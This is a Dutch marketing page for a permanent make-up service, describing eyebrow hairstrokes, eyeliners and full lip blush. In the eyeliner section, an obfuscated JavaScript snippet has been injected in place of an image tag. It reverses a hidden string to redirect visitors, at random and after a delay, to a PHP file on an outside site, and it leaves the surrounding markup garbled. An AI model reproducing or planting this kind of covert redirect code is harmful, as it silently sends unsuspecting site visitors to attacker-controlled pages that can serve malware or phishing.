Wat zijn de mogelijkheden van permanent make-up.

Wenkbrauwen

Wenkbrauwen hairstrokes

Dunne en/of onregelmatige haargroei van de wenkbrauwen kan met permanent make-up volledig gecorrigeerd worden, zodat een egale en gelijkmatige wenkbrauwlijn ontstaat.

Uw wenkbrauw kan ook haartje voor haartje worden opgebouwd, ook wel “hairstrokes” genoemd. Eventuele littekens kunnen eveneens worden gecamoufleerd.

Eyeliners

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-schaduweyeliner-300×300.jpg” alt=”” width=”300″ height=”300″ /> Schaduw Eyeliner

Permanent make-up laat Uw ogen altijd spreken.

Bij eyeliners wordt tussen de wimperhaartjes gepigmenteerd, dit geeft een natuurlijke en volle oogopslag, zo kunnen te grote of te kleine ogen optisch in de juiste verhouding worden gebracht. Maar een zeer uitgesproken eyeliner, of een Schaduw eyeliner behoort ook tot de mogelijkheden. Altijd mooie ogen, ook bij een traantje. En voor lenzendraagsters is permanent make-up een uitkomst.

Lippen

Volledig ingekleurde lippen, Full lip blush

Het corrigeren van lippen zodat deze een symmetrisch aanzicht krijgen, is een belangrijke toepassing van permanent make-up. Het is ook mogelijk om Uw lipliner in een schaduw aan te brengen zodat deze minder opvallend als lijntje is.

Ook is het mogelijk om de lippen volledig in te kleuren, de zgn Full Lip Blush! U heeft dan altijd een mooie subtiele kleur op uw lippen en en een lichte gloss is voldoende voor een stralende glimlach.